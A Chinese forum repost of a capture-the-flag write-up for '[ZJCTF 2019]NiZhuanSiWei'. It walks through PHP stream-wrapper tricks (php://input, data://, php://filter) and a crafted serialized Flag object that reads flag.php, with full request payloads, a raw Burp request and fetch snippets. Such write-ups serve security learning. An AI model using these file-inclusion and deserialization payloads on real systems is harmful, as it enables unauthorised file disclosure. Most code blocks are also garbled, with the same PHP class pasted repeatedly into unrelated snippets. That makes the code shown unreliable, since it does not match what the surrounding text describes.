登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 业界 [ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei

麓吆 昨天 12:39
程序园永久vip申请,无限下载程序园所有程序/软件/数据/等
00.搭环境

写wp的时候,buu靶场暂时访问不了,因此我们根据题目所给的链接,用docker自己搭起来
  1. docker-compose up -d<?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  <?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>  <?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  <?php  
  42. class Flag{  //flag.php  
  43.     public $file;  
  44.     public function __tostring(){  
  45.         if(isset($this->file)){  
  46.             echo file_get_contents($this->file);
  47.             echo "
  48. ";
  49.         return ("U R SO CLOSE !///COME ON PLZ");
  50.         }  
  51.     }  
  52. }  
  53. ?>  <?php  
  55. class Flag{  //flag.php  
  56.     public $file;  
  57.     public function __tostring(){  
  58.         if(isset($this->file)){  
  59.             echo file_get_contents($this->file);
  60.             echo "
  61. ";
  62.         return ("U R SO CLOSE !///COME ON PLZ");
  63.         }  
  64.     }  
  65. }  
  66. ?>  <?php  
  68. class Flag{  //flag.php  
  69.     public $file;  
  70.     public function __tostring(){  
  71.         if(isset($this->file)){  
  72.             echo file_get_contents($this->file);
  73.             echo "
  74. ";
  75.         return ("U R SO CLOSE !///COME ON PLZ");
  76.         }  
  77.     }  
  78. }  
  79. ?>  <?php  
  81. class Flag{  //flag.php  
  82.     public $file;  
  83.     public function __tostring(){  
  84.         if(isset($this->file)){  
  85.             echo file_get_contents($this->file);
  86.             echo "
  87. ";
  88.         return ("U R SO CLOSE !///COME ON PLZ");
  89.         }  
  90.     }  
  91. }  
  92. ?>  <?php  
  94. class Flag{  //flag.php  
  95.     public $file;  
  96.     public function __tostring(){  
  97.         if(isset($this->file)){  
  98.             echo file_get_contents($this->file);
  99.             echo "
  100. ";
  101.         return ("U R SO CLOSE !///COME ON PLZ");
  102.         }  
  103.     }  
  104. }  
  105. ?>  <?php  
  107. class Flag{  //flag.php  
  108.     public $file;  
  109.     public function __tostring(){  
  110.         if(isset($this->file)){  
  111.             echo file_get_contents($this->file);
  112.             echo "
  113. ";
  114.         return ("U R SO CLOSE !///COME ON PLZ");
  115.         }  
  116.     }  
  117. }  
  118. ?>   //docker先搭起来
  120. http://192.168.155.1:8302/                                                //ipconfig查看自己的IPv4 地址ip,都可以,192开头也行       
复制代码
访问靶场地址
可以看到源代码,我们copy下来分析一下
  1. [/code][size=5]01. 伪协议任意文件读取[/size]
  3. 这道题一共设置了三个Get参数,没有任何过滤。
  4. [code]$text = $_GET["text"];
  5. $file = $_GET["file"];
  6. $password = $_GET["password"];
  7. if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
复制代码
先看第一个text参数的作用,我们需要让text参数不为空isset($text),并且要使file_get_contents($text,'r')读取的内容为welcome to the zjctf字符串,这样,我们就能进入第一层if循环,且用html样式输出h1标签的welcome to the zjctf,代码如下,
  1. echo "
  2. <h1>".file_get_contents($text,'r')."</h1></br>";
复制代码
file_get_contents这个函数是读取文件内容的,怎么使他等于我们想要的字符串呢?这里的话,就需要用到伪协议绕过php://input,我们这里构造请求:
:::info
Get请求: ?text=php://input
Post请求:welcome to the zjctf
:::
这样,file_get_contents就会从 POST 输入流中读取数据,从而绕过第一层检测。
emm,,但是不出意外的话,就出意外了,并没有h1高亮显示welcome to the zjctf,没有反应,

于是这里我们换一种方式,用data://协议,直接Get请求
  1. d2VsY29tZSB0byB0aGUgempjdGY=<?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  <?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>          //welcome to the zjctf ----<?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  base64编码
  41. ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
复制代码
结果如下,成功h1高亮显示welcome to the zjctf。
后续:我测试了在控制台上发包,确实是能成功返回的,但是不知道为什么用hackbar就是不行,如下为javaScript发包代码(控制台)
  1. fetch('http://192.168.155.1:8302/?text=php://input', {
  2. <?php  
  4. class Flag{  //flag.php  
  5.     public $file;  
  6.     public function __tostring(){  
  7.         if(isset($this->file)){  
  8.             echo file_get_contents($this->file);
  9.             echo "
  10. ";
  11.         return ("U R SO CLOSE !///COME ON PLZ");
  12.         }  
  13.     }  
  14. }  
  15. ?>  method: 'POST',
  16. <?php  
  18. class Flag{  //flag.php  
  19.     public $file;  
  20.     public function __tostring(){  
  21.         if(isset($this->file)){  
  22.             echo file_get_contents($this->file);
  23.             echo "
  24. ";
  25.         return ("U R SO CLOSE !///COME ON PLZ");
  26.         }  
  27.     }  
  28. }  
  29. ?>  body: 'welcome to the zjctf',
  30. <?php  
  32. class Flag{  //flag.php  
  33.     public $file;  
  34.     public function __tostring(){  
  35.         if(isset($this->file)){  
  36.             echo file_get_contents($this->file);
  37.             echo "
  38. ";
  39.         return ("U R SO CLOSE !///COME ON PLZ");
  40.         }  
  41.     }  
  42. }  
  43. ?>  headers: {
  44. <?php  
  46. class Flag{  //flag.php  
  47.     public $file;  
  48.     public function __tostring(){  
  49.         if(isset($this->file)){  
  50.             echo file_get_contents($this->file);
  51.             echo "
  52. ";
  53.         return ("U R SO CLOSE !///COME ON PLZ");
  54.         }  
  55.     }  
  56. }  
  57. ?>  <?php  
  59. class Flag{  //flag.php  
  60.     public $file;  
  61.     public function __tostring(){  
  62.         if(isset($this->file)){  
  63.             echo file_get_contents($this->file);
  64.             echo "
  65. ";
  66.         return ("U R SO CLOSE !///COME ON PLZ");
  67.         }  
  68.     }  
  69. }  
  70. ?>  'Content-Type': 'application/x-www-form-urlencoded'
  71. <?php  
  73. class Flag{  //flag.php  
  74.     public $file;  
  75.     public function __tostring(){  
  76.         if(isset($this->file)){  
  77.             echo file_get_contents($this->file);
  78.             echo "
  79. ";
  80.         return ("U R SO CLOSE !///COME ON PLZ");
  81.         }  
  82.     }  
  83. }  
  84. ?>  }
  85. }).then(res => res.text()).then(data => console.log(data));
复制代码
同理,在burp上也是可以的
02. 文件包含 + 反序列化

现在我们接着往下走,我们现在就是要利用这个include文件包含操作,去包含文件,虽然他直接限制了flag文件,防止我们直接包含flag.php,但并没有过滤其他文件。那我们可以按照题目提示,先包含useless.php看看这个是什么文件,看文件名,猜测涉及序列化操作
  1. if(preg_match("/flag/",$file)){
  2. <?php  
  4. class Flag{  //flag.php  
  5.     public $file;  
  6.     public function __tostring(){  
  7.         if(isset($this->file)){  
  8.             echo file_get_contents($this->file);
  9.             echo "
  10. ";
  11.         return ("U R SO CLOSE !///COME ON PLZ");
  12.         }  
  13.     }  
  14. }  
  15. ?>  <?php  
  17. class Flag{  //flag.php  
  18.     public $file;  
  19.     public function __tostring(){  
  20.         if(isset($this->file)){  
  21.             echo file_get_contents($this->file);
  22.             echo "
  23. ";
  24.         return ("U R SO CLOSE !///COME ON PLZ");
  25.         }  
  26.     }  
  27. }  
  28. ?>  <?php  
  30. class Flag{  //flag.php  
  31.     public $file;  
  32.     public function __tostring(){  
  33.         if(isset($this->file)){  
  34.             echo file_get_contents($this->file);
  35.             echo "
  36. ";
  37.         return ("U R SO CLOSE !///COME ON PLZ");
  38.         }  
  39.     }  
  40. }  
  41. ?>  <?php  
  43. class Flag{  //flag.php  
  44.     public $file;  
  45.     public function __tostring(){  
  46.         if(isset($this->file)){  
  47.             echo file_get_contents($this->file);
  48.             echo "
  49. ";
  50.         return ("U R SO CLOSE !///COME ON PLZ");
  51.         }  
  52.     }  
  53. }  
  54. ?>  echo "Not now!";
  55. <?php  
  57. class Flag{  //flag.php  
  58.     public $file;  
  59.     public function __tostring(){  
  60.         if(isset($this->file)){  
  61.             echo file_get_contents($this->file);
  62.             echo "
  63. ";
  64.         return ("U R SO CLOSE !///COME ON PLZ");
  65.         }  
  66.     }  
  67. }  
  68. ?>  <?php  
  70. class Flag{  //flag.php  
  71.     public $file;  
  72.     public function __tostring(){  
  73.         if(isset($this->file)){  
  74.             echo file_get_contents($this->file);
  75.             echo "
  76. ";
  77.         return ("U R SO CLOSE !///COME ON PLZ");
  78.         }  
  79.     }  
  80. }  
  81. ?>  <?php  
  83. class Flag{  //flag.php  
  84.     public $file;  
  85.     public function __tostring(){  
  86.         if(isset($this->file)){  
  87.             echo file_get_contents($this->file);
  88.             echo "
  89. ";
  90.         return ("U R SO CLOSE !///COME ON PLZ");
  91.         }  
  92.     }  
  93. }  
  94. ?>  <?php  
  96. class Flag{  //flag.php  
  97.     public $file;  
  98.     public function __tostring(){  
  99.         if(isset($this->file)){  
  100.             echo file_get_contents($this->file);
  101.             echo "
  102. ";
  103.         return ("U R SO CLOSE !///COME ON PLZ");
  104.         }  
  105.     }  
  106. }  
  107. ?>  exit();
  108. <?php  
  110. class Flag{  //flag.php  
  111.     public $file;  
  112.     public function __tostring(){  
  113.         if(isset($this->file)){  
  114.             echo file_get_contents($this->file);
  115.             echo "
  116. ";
  117.         return ("U R SO CLOSE !///COME ON PLZ");
  118.         }  
  119.     }  
  120. }  
  121. ?>  <?php  
  123. class Flag{  //flag.php  
  124.     public $file;  
  125.     public function __tostring(){  
  126.         if(isset($this->file)){  
  127.             echo file_get_contents($this->file);
  128.             echo "
  129. ";
  130.         return ("U R SO CLOSE !///COME ON PLZ");
  131.         }  
  132.     }  
  133. }  
  134. ?>  }else{
  135. <?php  
  137. class Flag{  //flag.php  
  138.     public $file;  
  139.     public function __tostring(){  
  140.         if(isset($this->file)){  
  141.             echo file_get_contents($this->file);
  142.             echo "
  143. ";
  144.         return ("U R SO CLOSE !///COME ON PLZ");
  145.         }  
  146.     }  
  147. }  
  148. ?>  <?php  
  150. class Flag{  //flag.php  
  151.     public $file;  
  152.     public function __tostring(){  
  153.         if(isset($this->file)){  
  154.             echo file_get_contents($this->file);
  155.             echo "
  156. ";
  157.         return ("U R SO CLOSE !///COME ON PLZ");
  158.         }  
  159.     }  
  160. }  
  161. ?>  <?php  
  163. class Flag{  //flag.php  
  164.     public $file;  
  165.     public function __tostring(){  
  166.         if(isset($this->file)){  
  167.             echo file_get_contents($this->file);
  168.             echo "
  169. ";
  170.         return ("U R SO CLOSE !///COME ON PLZ");
  171.         }  
  172.     }  
  173. }  
  174. ?>  <?php  
  176. class Flag{  //flag.php  
  177.     public $file;  
  178.     public function __tostring(){  
  179.         if(isset($this->file)){  
  180.             echo file_get_contents($this->file);
  181.             echo "
  182. ";
  183.         return ("U R SO CLOSE !///COME ON PLZ");
  184.         }  
  185.     }  
  186. }  
  187. ?>  include($file);<?php  
  189. class Flag{  //flag.php  
  190.     public $file;  
  191.     public function __tostring(){  
  192.         if(isset($this->file)){  
  193.             echo file_get_contents($this->file);
  194.             echo "
  195. ";
  196.         return ("U R SO CLOSE !///COME ON PLZ");
  197.         }  
  198.     }  
  199. }  
  200. ?>  //useless.php
  201. <?php  
  203. class Flag{  //flag.php  
  204.     public $file;  
  205.     public function __tostring(){  
  206.         if(isset($this->file)){  
  207.             echo file_get_contents($this->file);
  208.             echo "
  209. ";
  210.         return ("U R SO CLOSE !///COME ON PLZ");
  211.         }  
  212.     }  
  213. }  
  214. ?>  <?php  
  216. class Flag{  //flag.php  
  217.     public $file;  
  218.     public function __tostring(){  
  219.         if(isset($this->file)){  
  220.             echo file_get_contents($this->file);
  221.             echo "
  222. ";
  223.         return ("U R SO CLOSE !///COME ON PLZ");
  224.         }  
  225.     }  
  226. }  
  227. ?>  <?php  
  229. class Flag{  //flag.php  
  230.     public $file;  
  231.     public function __tostring(){  
  232.         if(isset($this->file)){  
  233.             echo file_get_contents($this->file);
  234.             echo "
  235. ";
  236.         return ("U R SO CLOSE !///COME ON PLZ");
  237.         }  
  238.     }  
  239. }  
  240. ?>  <?php  
  242. class Flag{  //flag.php  
  243.     public $file;  
  244.     public function __tostring(){  
  245.         if(isset($this->file)){  
  246.             echo file_get_contents($this->file);
  247.             echo "
  248. ";
  249.         return ("U R SO CLOSE !///COME ON PLZ");
  250.         }  
  251.     }  
  252. }  
  253. ?>  $password = unserialize($password);
  254. <?php  
  256. class Flag{  //flag.php  
  257.     public $file;  
  258.     public function __tostring(){  
  259.         if(isset($this->file)){  
  260.             echo file_get_contents($this->file);
  261.             echo "
  262. ";
  263.         return ("U R SO CLOSE !///COME ON PLZ");
  264.         }  
  265.     }  
  266. }  
  267. ?>  <?php  
  269. class Flag{  //flag.php  
  270.     public $file;  
  271.     public function __tostring(){  
  272.         if(isset($this->file)){  
  273.             echo file_get_contents($this->file);
  274.             echo "
  275. ";
  276.         return ("U R SO CLOSE !///COME ON PLZ");
  277.         }  
  278.     }  
  279. }  
  280. ?>  <?php  
  282. class Flag{  //flag.php  
  283.     public $file;  
  284.     public function __tostring(){  
  285.         if(isset($this->file)){  
  286.             echo file_get_contents($this->file);
  287.             echo "
  288. ";
  289.         return ("U R SO CLOSE !///COME ON PLZ");
  290.         }  
  291.     }  
  292. }  
  293. ?>  <?php  
  295. class Flag{  //flag.php  
  296.     public $file;  
  297.     public function __tostring(){  
  298.         if(isset($this->file)){  
  299.             echo file_get_contents($this->file);
  300.             echo "
  301. ";
  302.         return ("U R SO CLOSE !///COME ON PLZ");
  303.         }  
  304.     }  
  305. }  
  306. ?>  echo $password;
  307. <?php  
  309. class Flag{  //flag.php  
  310.     public $file;  
  311.     public function __tostring(){  
  312.         if(isset($this->file)){  
  313.             echo file_get_contents($this->file);
  314.             echo "
  315. ";
  316.         return ("U R SO CLOSE !///COME ON PLZ");
  317.         }  
  318.     }  
  319. }  
  320. ?>  <?php  
  322. class Flag{  //flag.php  
  323.     public $file;  
  324.     public function __tostring(){  
  325.         if(isset($this->file)){  
  326.             echo file_get_contents($this->file);
  327.             echo "
  328. ";
  329.         return ("U R SO CLOSE !///COME ON PLZ");
  330.         }  
  331.     }  
  332. }  
  333. ?>  }
  334. }
复制代码
它包含get参数file,那我们的paylaod如下(利用伪协议php://filter):
  1. file=php://filter/read=convert.base64-encode/resource=useless.php
复制代码
使用burp返回包如下,
,如果用hackbar的话,直接用只涉及get请求的payload:
  1. ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php
复制代码
会返回一串base64编码的结果,我们解码之后copy下来:

useless.php文件内容如下
  1. <?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  
复制代码
这里的Flag类用到了魔术方法__tostring,还用到了file_get_contents,并且属性$file是我们可控的,那这里我们就可以去构造一个属性$file等于flag.php,并且将它做序列化操作,并将序列化后的数据参数传递给password,(注意参数file需要包含useless.php)我们可以看到,在index里面,$password是会进行反序列化操作的,服务器将我们的反序列化的paylaod数据重新反序列化为一个对象,在之后,进行了echo $password操作,此时由于$password是对象,将对象当做字符串处理会自动触发Flag类里的__tostring魔术方法,从而导致执行echo file_get_contents($this->file);,而此时的$file属性已经是被我们修改后的flag.php,file_get_contents函数就会去执行文件读取操作,去读取flag.php的内容,从而输出flag
  1. <?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  <?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>  }else{<?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  <?php  
  42. class Flag{  //flag.php  
  43.     public $file;  
  44.     public function __tostring(){  
  45.         if(isset($this->file)){  
  46.             echo file_get_contents($this->file);
  47.             echo "
  48. ";
  49.         return ("U R SO CLOSE !///COME ON PLZ");
  50.         }  
  51.     }  
  52. }  
  53. ?>  <?php  
  55. class Flag{  //flag.php  
  56.     public $file;  
  57.     public function __tostring(){  
  58.         if(isset($this->file)){  
  59.             echo file_get_contents($this->file);
  60.             echo "
  61. ";
  62.         return ("U R SO CLOSE !///COME ON PLZ");
  63.         }  
  64.     }  
  65. }  
  66. ?>  <?php  
  68. class Flag{  //flag.php  
  69.     public $file;  
  70.     public function __tostring(){  
  71.         if(isset($this->file)){  
  72.             echo file_get_contents($this->file);
  73.             echo "
  74. ";
  75.         return ("U R SO CLOSE !///COME ON PLZ");
  76.         }  
  77.     }  
  78. }  
  79. ?>  include($file);<?php  
  81. class Flag{  //flag.php  
  82.     public $file;  
  83.     public function __tostring(){  
  84.         if(isset($this->file)){  
  85.             echo file_get_contents($this->file);
  86.             echo "
  87. ";
  88.         return ("U R SO CLOSE !///COME ON PLZ");
  89.         }  
  90.     }  
  91. }  
  92. ?>  //useless.php<?php  
  94. class Flag{  //flag.php  
  95.     public $file;  
  96.     public function __tostring(){  
  97.         if(isset($this->file)){  
  98.             echo file_get_contents($this->file);
  99.             echo "
  100. ";
  101.         return ("U R SO CLOSE !///COME ON PLZ");
  102.         }  
  103.     }  
  104. }  
  105. ?>  <?php  
  107. class Flag{  //flag.php  
  108.     public $file;  
  109.     public function __tostring(){  
  110.         if(isset($this->file)){  
  111.             echo file_get_contents($this->file);
  112.             echo "
  113. ";
  114.         return ("U R SO CLOSE !///COME ON PLZ");
  115.         }  
  116.     }  
  117. }  
  118. ?>  <?php  
  120. class Flag{  //flag.php  
  121.     public $file;  
  122.     public function __tostring(){  
  123.         if(isset($this->file)){  
  124.             echo file_get_contents($this->file);
  125.             echo "
  126. ";
  127.         return ("U R SO CLOSE !///COME ON PLZ");
  128.         }  
  129.     }  
  130. }  
  131. ?>  <?php  
  133. class Flag{  //flag.php  
  134.     public $file;  
  135.     public function __tostring(){  
  136.         if(isset($this->file)){  
  137.             echo file_get_contents($this->file);
  138.             echo "
  139. ";
  140.         return ("U R SO CLOSE !///COME ON PLZ");
  141.         }  
  142.     }  
  143. }  
  144. ?>  $password = unserialize($password);<?php  
  146. class Flag{  //flag.php  
  147.     public $file;  
  148.     public function __tostring(){  
  149.         if(isset($this->file)){  
  150.             echo file_get_contents($this->file);
  151.             echo "
  152. ";
  153.         return ("U R SO CLOSE !///COME ON PLZ");
  154.         }  
  155.     }  
  156. }  
  157. ?>  <?php  
  159. class Flag{  //flag.php  
  160.     public $file;  
  161.     public function __tostring(){  
  162.         if(isset($this->file)){  
  163.             echo file_get_contents($this->file);
  164.             echo "
  165. ";
  166.         return ("U R SO CLOSE !///COME ON PLZ");
  167.         }  
  168.     }  
  169. }  
  170. ?>  <?php  
  172. class Flag{  //flag.php  
  173.     public $file;  
  174.     public function __tostring(){  
  175.         if(isset($this->file)){  
  176.             echo file_get_contents($this->file);
  177.             echo "
  178. ";
  179.         return ("U R SO CLOSE !///COME ON PLZ");
  180.         }  
  181.     }  
  182. }  
  183. ?>  <?php  
  185. class Flag{  //flag.php  
  186.     public $file;  
  187.     public function __tostring(){  
  188.         if(isset($this->file)){  
  189.             echo file_get_contents($this->file);
  190.             echo "
  191. ";
  192.         return ("U R SO CLOSE !///COME ON PLZ");
  193.         }  
  194.     }  
  195. }  
  196. ?>  echo $password;<?php  
  198. class Flag{  //flag.php  
  199.     public $file;  
  200.     public function __tostring(){  
  201.         if(isset($this->file)){  
  202.             echo file_get_contents($this->file);
  203.             echo "
  204. ";
  205.         return ("U R SO CLOSE !///COME ON PLZ");
  206.         }  
  207.     }  
  208. }  
  209. ?>  <?php  
  211. class Flag{  //flag.php  
  212.     public $file;  
  213.     public function __tostring(){  
  214.         if(isset($this->file)){  
  215.             echo file_get_contents($this->file);
  216.             echo "
  217. ";
  218.         return ("U R SO CLOSE !///COME ON PLZ");
  219.         }  
  220.     }  
  221. }  
  222. ?>  }}
复制代码
根据提示,我们去读取flag.php,
  1. [/code]输出
  2. [code]O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
复制代码
payload如下
  1. POST /?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} HTTP/1.1
  2. Host: 192.168.45.1:8302
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  9. Connection: close
  10. Content-Length: 20
  12. welcome to the zjctf
复制代码
或者
  1. /?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
复制代码
flag在注释中,需要看源代码
流程图如下:
最开始解题时的控制台js代码:
绕if
  1. fetch('http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input', {<?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  method: 'POST',<?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>  body: 'welcome to the zjctf',<?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  headers: {<?php  
  42. class Flag{  //flag.php  
  43.     public $file;  
  44.     public function __tostring(){  
  45.         if(isset($this->file)){  
  46.             echo file_get_contents($this->file);
  47.             echo "
  48. ";
  49.         return ("U R SO CLOSE !///COME ON PLZ");
  50.         }  
  51.     }  
  52. }  
  53. ?>  <?php  
  55. class Flag{  //flag.php  
  56.     public $file;  
  57.     public function __tostring(){  
  58.         if(isset($this->file)){  
  59.             echo file_get_contents($this->file);
  60.             echo "
  61. ";
  62.         return ("U R SO CLOSE !///COME ON PLZ");
  63.         }  
  64.     }  
  65. }  
  66. ?>  'Content-Type': 'application/x-www-form-urlencoded'<?php  
  68. class Flag{  //flag.php  
  69.     public $file;  
  70.     public function __tostring(){  
  71.         if(isset($this->file)){  
  72.             echo file_get_contents($this->file);
  73.             echo "
  74. ";
  75.         return ("U R SO CLOSE !///COME ON PLZ");
  76.         }  
  77.     }  
  78. }  
  79. ?>  }}).then(res => res.text()).then(data => console.log(data));
复制代码
读useless.php
  1. fetch('http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input&file=php://filter/convert.base64-encode/resource=useless.php', {<?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  method: 'POST',<?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>  body: 'welcome to the zjctf',<?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  headers: {<?php  
  42. class Flag{  //flag.php  
  43.     public $file;  
  44.     public function __tostring(){  
  45.         if(isset($this->file)){  
  46.             echo file_get_contents($this->file);
  47.             echo "
  48. ";
  49.         return ("U R SO CLOSE !///COME ON PLZ");
  50.         }  
  51.     }  
  52. }  
  53. ?>  <?php  
  55. class Flag{  //flag.php  
  56.     public $file;  
  57.     public function __tostring(){  
  58.         if(isset($this->file)){  
  59.             echo file_get_contents($this->file);
  60.             echo "
  61. ";
  62.         return ("U R SO CLOSE !///COME ON PLZ");
  63.         }  
  64.     }  
  65. }  
  66. ?>  'Content-Type': 'application/x-www-form-urlencoded'<?php  
  68. class Flag{  //flag.php  
  69.     public $file;  
  70.     public function __tostring(){  
  71.         if(isset($this->file)){  
  72.             echo file_get_contents($this->file);
  73.             echo "
  74. ";
  75.         return ("U R SO CLOSE !///COME ON PLZ");
  76.         }  
  77.     }  
  78. }  
  79. ?>  }}).then(res => res.text()).then(data => console.log(data));
复制代码
反序列化拿flag.php
  1. fetch('http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}', {<?php  
  3. class Flag{  //flag.php  
  4.     public $file;  
  5.     public function __tostring(){  
  6.         if(isset($this->file)){  
  7.             echo file_get_contents($this->file);
  8.             echo "
  9. ";
  10.         return ("U R SO CLOSE !///COME ON PLZ");
  11.         }  
  12.     }  
  13. }  
  14. ?>  method: 'POST',<?php  
  16. class Flag{  //flag.php  
  17.     public $file;  
  18.     public function __tostring(){  
  19.         if(isset($this->file)){  
  20.             echo file_get_contents($this->file);
  21.             echo "
  22. ";
  23.         return ("U R SO CLOSE !///COME ON PLZ");
  24.         }  
  25.     }  
  26. }  
  27. ?>  body: 'welcome to the zjctf',<?php  
  29. class Flag{  //flag.php  
  30.     public $file;  
  31.     public function __tostring(){  
  32.         if(isset($this->file)){  
  33.             echo file_get_contents($this->file);
  34.             echo "
  35. ";
  36.         return ("U R SO CLOSE !///COME ON PLZ");
  37.         }  
  38.     }  
  39. }  
  40. ?>  headers: {<?php  
  42. class Flag{  //flag.php  
  43.     public $file;  
  44.     public function __tostring(){  
  45.         if(isset($this->file)){  
  46.             echo file_get_contents($this->file);
  47.             echo "
  48. ";
  49.         return ("U R SO CLOSE !///COME ON PLZ");
  50.         }  
  51.     }  
  52. }  
  53. ?>  <?php  
  55. class Flag{  //flag.php  
  56.     public $file;  
  57.     public function __tostring(){  
  58.         if(isset($this->file)){  
  59.             echo file_get_contents($this->file);
  60.             echo "
  61. ";
  62.         return ("U R SO CLOSE !///COME ON PLZ");
  63.         }  
  64.     }  
  65. }  
  66. ?>  'Content-Type': 'application/x-www-form-urlencoded'<?php  
  68. class Flag{  //flag.php  
  69.     public $file;  
  70.     public function __tostring(){  
  71.         if(isset($this->file)){  
  72.             echo file_get_contents($this->file);
  73.             echo "
  74. ";
  75.         return ("U R SO CLOSE !///COME ON PLZ");
  76.         }  
  77.     }  
  78. }  
  79. ?>  }}).then(res => res.text()).then(data => console.log(data));
复制代码
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
ZJCTF2019NiZhuanSiWei

使用道具 举报

相关推荐
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
麓吆
昨天 12:39

0

粉丝关注

25

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫